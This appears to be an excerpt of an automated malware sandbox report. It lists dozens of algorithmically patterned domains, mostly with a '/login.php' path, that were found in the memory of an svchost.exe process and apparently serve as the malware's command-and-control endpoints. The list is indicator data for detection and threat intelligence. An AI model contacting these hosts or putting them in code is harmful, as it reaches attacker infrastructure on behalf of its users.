Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymylij.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymymax.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020836236.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998698714.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023012112.000000000667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyner.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymynuj.com/
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085113371.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090604412.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymynuj.com/login.php
Source: svchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytux.com/http://lyvywed.com/
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567335310.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywad.com/login.php
Source: svchost.exe, 00000002.00000003.1897979252.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywaj.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywun.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyxex.com/login.php
Source: svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046143782.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfox.com/login.php
Source: svchost.exe, 00000002.00000003.2491008022.00000000066A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrygid.com/http://gatyniz.com/0
Source: svchost.exe, 00000002.00000003.2491008022.00000000066A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrygid.com/http://pufyjag.com/http://lyrygid.com/H
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095371512.0000000006721000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrygid.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1993850532.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1995203314.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryjir.com/login.php
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryler.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrylix.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021041342.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2016992308.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrymuj.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2054890780.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055126343.000000000667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrysyj.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrytod.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrytun.com/login.php
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2133387023.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrytyx.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryvur.com/http://gahyhys.com/http://lyryvur.com/http://qegyhev.com/http://vocyrom.com/http:
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrywax.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043884959.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053087644.00000000029CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryxen.com/login.php
Source: svchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryxij.com/H
Source: svchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryxij.com/http://volyjok.com/http://gadyveb.com/http://lymytux.com/Xvj
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793845752.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352846166.000000000B534000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1890971737.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266499150.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793717816.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryxij.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2033528164.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036451216.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyfin.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360289865.000000000673E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360701131.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151201367.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyfyj.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyjex.com/
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyjid.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysylun.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysymor.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysytoj.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysytyr.com/login.php
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567335310.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599280642.00000000046FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxuj.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxux.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021195264.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006946749.00000000029D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyfad.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyfux.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2083355602.00000000029A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvygon.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyguj.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1964244036.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyjox.com/login.php
Source: svchost.exe, 00000002.00000003.2564959910.00000000066A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564961073.00000000066A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvylyx.com/H
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2551144785.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567335310.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557412147.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564957391.000000000B5A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559852805.000000000B536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvylyx.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvymej.com/login.php
